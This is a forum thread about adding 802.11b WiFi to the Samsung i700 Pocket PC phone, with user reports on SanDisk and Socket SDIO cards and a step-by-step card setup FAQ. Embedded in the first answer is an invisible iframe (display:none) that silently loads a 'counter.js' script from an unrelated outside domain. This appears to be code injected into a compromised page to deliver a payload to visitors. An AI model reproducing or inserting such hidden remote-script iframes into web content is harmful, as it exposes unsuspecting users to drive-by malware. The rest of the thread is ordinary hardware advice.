+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

Does the Samsung i700 support 802.11b / WiFi?

No, it does not support 802.11b / WiFi directly. It does, however, have an SDIO slot, but you need drivers to support the SDIO card that you intend to use. No cards are currently available with the appropriate drivers. If you discover one, please reply with info so that we can update the answer.

The whole SDIO driver thing is a bit of a mess from what I've heard. This Brighthand Article explains the problem HERE. The good news is that this article reports that the Samsung i700 supports BSquare's SDIO NOW! program that is designed to standardize SDIO drivers, so I would say its very likely that we'll see an 802.11B card for this device.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

SanDisk offers Wi-fi solution for Samsung i700

SDIO card for wi-fi 802.11b networks now available, $129 at sandisk.com

WiFi / 802.11b

There are two options at this time. The (slightly) cheaper option is the SanDisk SD WiFi card, which can run anywhere from $95 to $150 depending on where you buy it. The seconds is the Socket IO SD WiFi card, which is a few bucks more.

My personal experience with the SanDisk card is that it works, but the software installation 'experience' was a bit of a challenge. Once the software (drivers and utility interface) are installed, it works like a charm.

The utility software is highly functional, providing both an excellent AP browser and a ping utility as well (a nice touch).

- Wintermute3

Using WIFI ON Samsung I700

I just purchased an I700 from Verizon on 3/05/2004. I also purchased a Sandisk Wi-Fi SDIO wireless SD card and it works well with my Linksys 802.11b wireless network. I did need to install the drivers twice to get the card to work. I also disabled my phone link just to make sure I was really surfing with the Wi-Fi connection and not Express Network. The Sandisk Wi-Fi setup program is easy to use and supports 128 bit WEP.
    Craig
    Virtual Life Support

Did the Sandisk WiFi come with all the i700 drivers needed?

Mike

The Sandisk WiFi card came with a CD will all the drivers that you need. It did take two tries to install them correctly, so you may need to do the same.

I have found that removing the WiFI card before shutting down the I700 will keep you from having to soft reset it so often.

Working with the CPU in Turbo Mode seems to speed up web sufing.
    Craig
    Virtual Life Support

Keeping Flight Attendants Busy stevesurf's Avatar

Post FAQ-SanDisk WiFi Card Setup

Install the SanDisk WiFi Driver (the "SanDisk WiFi" icon should appear in the Programs section).

Make sure the installation procedure finishes.

Do a Soft Reset.

In the Today screen, there's an antenna in the tray, the LED flashes

Click on the antenna icon

Go to AP Browser

Your DLinks's SSID should already be in the "Active SSID's" window. If not, make sure the DLink AP has a DHCP server enabled, is broadcasting an SSID and, is initially not set to WEP. You can apply WEP later (you should)

Click on your SSID in the Active SSID Window. Select Add.

Click on the Status Tab.

Wait for a new IP address to be issued in the Station IP Info Window (should be 192.168.0.10 for example) This occurs after the BSS ID Window shows "Associating..."

Once an ip address is given to the PPC's SanDisk Card, the LED is solid.

You are ready to go!
    :bye:
    Steve

802.11b on i700

Sandisk makes an SDIO WiFi card that works quite nicely in the i700. http://sandisk.com/retail_sdwifi.html

i use the socket low power 802.11b lan card on my i700 and it works just fine.

Question Re: FAQ-SanDisk WiFi Card Setup

Originally posted by stevesurf
    Your DLinks's SSID should already be in the "Active SSID's" window. If not, make sure the DLink AP has a DHCP server enabled, is broadcasting an SSID and, is initially not set to WEP. You can apply WEP later (you should)

Steve, (or anyone else with related exp)

Lil help!

I have been playing with a Sandisk wifi card and getting some sketchy results. I have a wireless net using Wep, DHCP and not broadcasting an ssid. It sounds like your suggesting turning off Wep, turning on ssid broadcast and then requesting an IP from DHCP. Once I get that IP, can I put everything back the way I want it? Also, will I have to do that every time I connect to the network?

Thanks in advance

I am using Sandisk wifi w/256mb SD card. The install was tricky, but works. Being side mounted, the wifi SD card sticks out about an inch which makes it difficult to hold, but pocket IE does well and there are various scanners to find hot spots.

Regards, Chris